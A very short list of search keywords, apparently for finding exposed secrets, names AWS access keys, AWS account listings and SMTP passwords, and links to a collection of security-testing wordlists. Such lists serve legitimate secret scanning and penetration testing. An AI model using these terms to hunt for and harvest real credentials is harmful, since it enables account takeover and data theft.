AWS_ACCESS_KEY_ID
list_aws_accounts
SMTP password
github-wordlist-link
https://github.com/heilla/SecurityTesting/blob/master/wordlists/Collection%20of%20wordlists.md